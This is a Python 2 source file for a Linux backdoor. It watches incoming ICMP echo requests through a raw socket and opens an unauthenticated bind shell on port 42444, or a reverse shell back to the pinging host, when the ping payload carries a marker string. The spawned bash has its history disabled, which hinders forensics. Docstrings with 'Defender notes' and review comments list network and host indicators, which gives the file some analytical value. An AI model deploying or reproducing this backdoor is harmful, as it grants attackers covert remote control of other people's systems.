'''
Sniffs ICMP ECHO REQUEST packets to activate a shell on the server.
OS: Linux
Tiago Martins ([email protected])
'''
import socket
import sys
import os
import pty
import threading
from struct import *
# TCP port used by both shell modes: open_shell() binds and listens on it,
# open_reverse_shell() connects back to it on the triggering host.
PORT = 42444
# ICMP type 8 (echo request). main() only inspects payloads of packets whose
# parsed ICMP type equals this value.
ICMP_ECHO_REQUEST = 8
def open_shell():
    """Bind-shell mode: accept one TCP client on PORT and attach /bin/bash to it.

    Started on a worker thread by main(). The process-wide descriptors 0, 1 and
    2 are duplicated onto the accepted client socket for the duration of the
    pty.spawn() call and restored from saved copies afterwards. A socket.error
    is printed and followed by sys.exit().

    Defender notes: the listener is unauthenticated (first connection on PORT is
    served); the child is /bin/bash launched through a pty with HISTFILE set to
    /dev/null, so on the host the indicator is a bash child of this process
    whose stdio is a TCP socket. Because fds 0-2 are shared by all threads,
    anything else this process prints during the session goes to the client.
    """
    try:
        # Create socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Bind to all interfaces on PORT; backlog of one, a single accept().
        sock.bind(("", PORT))
        sock.listen(1)
        (cli, addr) = sock.accept()
        # Save previous standard in, out, and error
        oldInFd = os.dup(0)
        oldOutFd = os.dup(1)
        oldErrFd = os.dup(2)
        # Redirect standard in, out, and error
        os.dup2(cli.fileno(), 0)
        os.dup2(cli.fileno(), 1)
        os.dup2(cli.fileno(), 2)
        # Open shell interactive
        # HISTFILE=/dev/null is exported to the child so bash writes no history;
        # the absence of a history file for the session is itself a forensic hint.
        os.putenv("HISTFILE","/dev/null")
        # Blocks until the spawned bash exits.
        pty.spawn("/bin/bash")
        # Close socket
        # NOTE(review): only the listening socket is shut down/closed here; the
        # accepted socket `cli` is not explicitly closed in this block.
        sock.shutdown(socket.SHUT_RDWR)
        sock.close()
        # Restore standard in, out, and error
        os.dup2(oldInFd, 0)
        os.close(oldInFd)
        os.dup2(oldOutFd, 1)
        os.close(oldOutFd)
        os.dup2(oldErrFd, 2)
        os.close(oldErrFd)
    except socket.error as msg:
        # Python 2 print statement (the file is Python 2 only).
        print str(msg)
        # NOTE(review): sys.exit() raises SystemExit; on a worker thread this
        # ends only the thread, the main sniffing loop keeps running.
        sys.exit()
def open_reverse_shell(dest_address):
    """Reverse-shell mode: connect to dest_address:PORT and attach /bin/bash to it.

    Args:
        dest_address: IP address (string) to connect back to. main() passes the
            source address of the triggering ICMP echo request.

    Started on a worker thread by main(). As in open_shell(), fds 0-2 are
    duplicated onto the connected socket while pty.spawn() runs and restored
    afterwards; a socket.error is printed and followed by sys.exit().

    Defender notes: an outbound TCP connection to PORT on the host that sent
    the trigger ping, immediately followed by a bash child of this process with
    HISTFILE=/dev/null, is the observable sequence.
    """
    try:
        # Create socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Save previous standard in, out, and error
        oldInFd = os.dup(0)
        oldOutFd = os.dup(1)
        oldErrFd = os.dup(2)
        # Connect socket
        # NOTE(review): if connect() fails the saved fds above are never closed
        # (the except path exits the thread without restoring/closing them).
        sock.connect((dest_address, PORT))
        # Redirect standard in, out, and error
        os.dup2(sock.fileno(), 0)
        os.dup2(sock.fileno(), 1)
        os.dup2(sock.fileno(), 2)
        # Open shell interactive
        # HISTFILE=/dev/null is exported to the child so bash writes no history.
        os.putenv("HISTFILE","/dev/null")
        # Blocks until the spawned bash exits.
        pty.spawn("/bin/bash")
        # Close socket
        sock.shutdown(socket.SHUT_RDWR)
        sock.close()
        # Restore standard in, out, and error
        os.dup2(oldInFd, 0)
        os.close(oldInFd)
        os.dup2(oldOutFd, 1)
        os.close(oldOutFd)
        os.dup2(oldErrFd, 2)
        os.close(oldErrFd)
    except socket.error as msg:
        # Python 2 print statement (the file is Python 2 only).
        print str(msg)
        # NOTE(review): on a worker thread sys.exit() ends only this thread.
        sys.exit()
def main():
    """Sniff ICMP and start a shell thread when an echo request carries a trigger marker.

    Opens an AF_INET/SOCK_RAW/IPPROTO_ICMP socket (on Linux this needs root or
    CAP_NET_RAW, which is also the first thing to check when triaging a host
    running this), then loops forever over received datagrams: parses the
    20-byte IPv4 header, the 4-byte ICMP header, and for echo requests checks
    the payload (case-insensitively, anywhere in the data) for the markers
    "-*-ias-*-" (bind shell) or "-*-iars-*-" (reverse shell back to the
    sender's IP). Each match spawns a new thread; nothing authenticates the
    sender.

    Defender notes: the trigger is a plaintext marker inside an ICMP echo
    payload, so it is directly signaturable on the network; on the host, a
    process holding a raw ICMP socket that later spawns bash with its stdio on a
    TCP socket is the behavioural indicator. Several parsed fields (version,
    ttl, protocol, d_addr, icmp_code, icmp_checksum) are assigned but unused.
    """
    try:
        # Create socket raw - icmp
        # A raw ICMP socket receives a copy of every ICMP datagram delivered to
        # the host; there is no port to bind.
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    except socket.error , msg:
        # Python 2 `except X, e` syntax; msg[0] is errno, msg[1] the message.
        print "[!] Socket could not be created. Error Code : " + str(msg[0]) + " Message " + msg[1]
        sys.exit()
    while True:
        # Whole datagram including the IPv4 header; the sender address from
        # recvfrom is discarded and re-read from the header below.
        packet = sock.recvfrom(65565)[0]
        # IP packet
        # Fixed 20-byte IPv4 header: version/IHL, TOS, total length, id,
        # flags/fragment offset, TTL, protocol, checksum, src, dst.
        ip_header = packet[0:20]
        iph = unpack("!BBHHHBBH4s4s", ip_header)
        version_ihl = iph[0]
        version = version_ihl >> 4
        ihl = version_ihl & 0xF
        # IHL is in 32-bit words; ICMP header starts after any IP options.
        iph_length = ihl * 4
        ttl = iph[5]
        protocol = iph[6]
        s_addr = socket.inet_ntoa(iph[8])
        d_addr = socket.inet_ntoa(iph[9])
        # ICMP packet
        # Only type/code/checksum are read; the identifier/sequence words that
        # follow in an echo request are treated as part of the payload.
        icmph_length = 4
        icmp_header = packet[iph_length:iph_length+icmph_length]
        icmph = unpack("!BBH", icmp_header)
        icmp_type = icmph[0]
        icmp_code = icmph[1]
        icmp_checksum = icmph[2]
        if icmp_type == ICMP_ECHO_REQUEST:
            # PAYLOAD
            h_size = iph_length + icmph_length
            data = packet[h_size:]
            # Substring match, case-insensitive: any echo request containing
            # the marker from any source fires the shell.
            if "-*-ias-*-" in str(data).lower():
                print "[>] Open shell in: " + str(s_addr)
                bs_thread = threading.Thread(target=open_shell, args=())
                bs_thread.start()
            elif "-*-iars-*-" in str(data).lower():
                print "[>] Open reverse shell in: " + str(s_addr)
                # Connect-back target is the source IP of the trigger packet.
                brs_thread = threading.Thread(target=open_reverse_shell, args=(str(s_addr),))
                brs_thread.start()
# Script entry point: run the sniff loop until Ctrl-C, which is swallowed
# silently (no cleanup of the raw socket or any shell threads is performed).
if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        pass